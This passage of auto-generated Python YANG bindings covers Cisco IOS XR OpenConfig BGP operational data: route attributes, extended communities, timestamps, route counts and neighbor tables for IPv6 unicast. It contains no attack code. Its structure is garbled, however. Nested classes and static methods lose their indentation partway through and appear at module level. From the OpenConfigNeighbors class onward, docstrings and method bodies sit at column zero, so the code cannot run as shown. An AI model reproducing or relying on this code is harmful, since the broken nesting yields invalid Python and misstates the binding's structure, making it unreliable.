    .. attribute:: local_pref

    	LocalPref
    	**type**\: int

    	**range:** 0..4294967295

    	**config**\: False

    .. attribute:: atomic_aggr

    	AtomicAggr
    	**type**\: bool

    	**config**\: False

    .. attribute:: community

    	CommunityArray
    	**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community>`

    	**config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList, self).__init__()

        self.yang_name = "route-attr-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community))])
        self._leafs = OrderedDict([
            ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
            ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
            ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
            ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
            ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
            ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
        ])
        self.origin_type = None
        self.as_path = None
        self.as4_path = None
        self.med = None
        self.local_pref = None
        self.atomic_aggr = None

        # Singleton child containers.
        self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop()
        self.next_hop.parent = self
        self._children_name_map["next_hop"] = "next-hop"

        self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes()
        self.aggregrator_attributes.parent = self
        self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"

        # YANG list child: starts empty, populated on read.
        self.community = YList(self)
        self._segment_path = lambda: "route-attr-list"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)


    class NextHop(_Entity_):
        """
        NextHopAddress

        .. attribute:: afi

        	AFI
        	**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`

        	**config**\: False

        .. attribute:: ipv4_address

        	IPv4 Addr
        	**type**\: str

        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        	**config**\: False

        .. attribute:: ipv6_address

        	IPv6 Addr
        	**type**\: str

        	**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, self).__init__()

            self.yang_name = "next-hop"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            # Leaf-only container: no YANG children.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "next-hop"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop']['meta_info']


    class AggregratorAttributes(_Entity_):
        """
        AggregatorList

        .. attribute:: as_

        	AS number
        	**type**\: int

        	**range:** 0..4294967295

        	**config**\: False

        .. attribute:: as4

        	AS4 number
        	**type**\: int

        	**range:** 0..4294967295

        	**config**\: False

        .. attribute:: address

        	IPv4 address
        	**type**\: str

        	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()

            self.yang_name = "aggregrator-attributes"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                # 'as' is a Python keyword, hence the trailing underscore on the attr.
                ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
                ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
                ('address', (YLeaf(YType.str, 'address'), ['str'])),
            ])
            self.as_ = None
            self.as4 = None
            self.address = None
            self._segment_path = lambda: "aggregrator-attributes"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']


    class Community(_Entity_):
        """
        CommunityArray

        .. attribute:: objects

        	BGP OC objects
        	**type**\: str

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community, self).__init__()

            self.yang_name = "community"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "community"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community']['meta_info']

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
    """
    ExtAttributesList

    .. attribute:: originator_id

    	OriginatorID
    	**type**\: str

    	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

    	**config**\: False

    .. attribute:: aigp

    	AIGP
    	**type**\: int

    	**range:** 0..18446744073709551615

    	**config**\: False

    .. attribute:: path_id

    	PathId
    	**type**\: int

    	**range:** 0..4294967295

    	**config**\: False

    .. attribute:: cluster

    	ClusterList
    	**type**\: list of str

    	**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

    	**config**\: False

    .. attribute:: ext_community

    	ExtendedCommunityArray
    	**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity>`

    	**config**\: False

    .. attribute:: unknown_attributes

    	UnknownAttributes
    	**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes>`

    	**config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList, self).__init__()

        self.yang_name = "ext-attributes-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes))])
        self._leafs = OrderedDict([
            ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
            ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
            ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
            # leaf-list: YLeafList rather than YLeaf.
            ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
        ])
        self.originator_id = None
        self.aigp = None
        self.path_id = None
        self.cluster = []

        # YANG list children: start empty, populated on read.
        self.ext_community = YList(self)
        self.unknown_attributes = YList(self)
        self._segment_path = lambda: "ext-attributes-list"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)


    class ExtCommunity(_Entity_):
        """
        ExtendedCommunityArray

        .. attribute:: objects

        	BGP OC objects
        	**type**\: str

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()

            self.yang_name = "ext-community"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "ext-community"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']


    class UnknownAttributes(_Entity_):
        """
        UnknownAttributes

        .. attribute:: attribute_type

        	AttributeType
        	**type**\: int

        	**range:** 0..65535

        	**config**\: False

        .. attribute:: attribute_length

        	AttributeLength
        	**type**\: int

        	**range:** 0..65535

        	**config**\: False

        .. attribute:: attribute_value

        	Atributevalue
        	**type**\: str

        	**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

        	**config**\: False

        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()

            self.yang_name = "unknown-attributes"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = False
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
                ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
                ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
            ])
            self.attribute_type = None
            self.attribute_length = None
            self.attribute_value = None
            self._segment_path = lambda: "unknown-attributes"
            self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import avoids loading the (large) meta module unless needed.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate

    .. attribute:: time_value

    	TimeValue
    	**type**\: str

    	**config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate, self).__init__()

        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # Leaf-only container: single string leaf 'time-value'.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    .. attribute:: time_value

    	TimeValue
    	**type**\: str

    	**config**\: False

    """
    # NOTE: "Recieved" spelling comes from the YANG model and is part of the
    # public API; it must not be corrected here.

    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved, self).__init__()

        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # Leaf-only container: single string leaf 'time-value'.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    # Route-level meta lookup; lazy import keeps module load cheap.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
    # Routes-container meta lookup; lazy import keeps module load cheap.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes']['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table

    .. attribute:: num_routes

    	NumRoutes
    	**type**\: int

    	**range:** 0..18446744073709551615

    	**config**\: False

    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3-compatible super() call into the _Entity_ base class.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes, self).__init__()

        self.yang_name = "num-routes"
        self.yang_parent_name = "loc-rib"
        self.is_top_level_class = False
        self.has_list_ancestor = False
        self.ylist_key_names = []
        # Leaf-only container: single uint64 counter.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/%s" % self._segment_path()
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import avoids loading the (large) meta module unless needed.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    # LocRib-container meta lookup; lazy import keeps module load cheap.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
    return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib']['meta_info']
class OpenConfigNeighbors(_Entity_):
"""
Neighbor list
.. attribute:: open_config_neighbor
Neighbor name
**type**\: list of :py:class:`OpenConfigNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3-compatible super() call into the _Entity_ base class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors, self).__init__()

    # Container of the keyed "open-config-neighbor" YANG list.
    self.yang_name = "open-config-neighbors"
    self.yang_parent_name = "ipv6-unicast"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    self.ylist_key_names = []
    self._child_classes = OrderedDict([("open-config-neighbor", ("open_config_neighbor", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor))])
    # No leaves on this container.
    self._leafs = OrderedDict()
    # YANG list child: starts empty, populated on read.
    self.open_config_neighbor = YList(self)
    self._segment_path = lambda: "open-config-neighbors"
    self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/%s" % self._segment_path()
    self._is_frozen = True
def __setattr__(self, name, value):
    # No leaves here, hence the empty leaf-name list; base still enforces
    # the frozen-attribute policy.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors, [], name, value)
class OpenConfigNeighbor(_Entity_):
"""
Neighbor name
.. attribute:: neighbor_address (key)
Neighbor Address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: adj_rib_in_post
Adjacency rib in\-bound post\-policy table
**type**\: :py:class:`AdjRibInPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost>`
**config**\: False
.. attribute:: adj_rib_out_post
Adjacency rib out\-bound post\-policy table
**type**\: :py:class:`AdjRibOutPost <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost>`
**config**\: False
.. attribute:: adj_rib_out_pre
Adjacency rib out\-bound pre\-policy table
**type**\: :py:class:`AdjRibOutPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre>`
**config**\: False
.. attribute:: adj_rib_in_pre
Adjacency rib in\-bound pre\-policy table
**type**\: :py:class:`AdjRibInPre <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3-compatible super() call into the _Entity_ base class.
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor, self).__init__()

    self.yang_name = "open-config-neighbor"
    self.yang_parent_name = "open-config-neighbors"
    self.is_top_level_class = False
    self.has_list_ancestor = False
    # This entity is a keyed YANG list entry; key leaf is neighbor_address.
    self.ylist_key_names = ['neighbor_address']
    self._child_classes = OrderedDict([("adj-rib-in-post", ("adj_rib_in_post", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost)), ("adj-rib-out-post", ("adj_rib_out_post", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost)), ("adj-rib-out-pre", ("adj_rib_out_pre", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre)), ("adj-rib-in-pre", ("adj_rib_in_pre", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre))])
    self._leafs = OrderedDict([
        # ['str','str']: union of IPv4-pattern and IPv6-pattern string leaves.
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
    ])
    self.neighbor_address = None

    # Eagerly instantiate the four adjacency-RIB child containers.
    self.adj_rib_in_post = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost()
    self.adj_rib_in_post.parent = self
    self._children_name_map["adj_rib_in_post"] = "adj-rib-in-post"

    self.adj_rib_out_post = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost()
    self.adj_rib_out_post.parent = self
    self._children_name_map["adj_rib_out_post"] = "adj-rib-out-post"

    self.adj_rib_out_pre = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre()
    self.adj_rib_out_pre.parent = self
    self._children_name_map["adj_rib_out_pre"] = "adj-rib-out-pre"

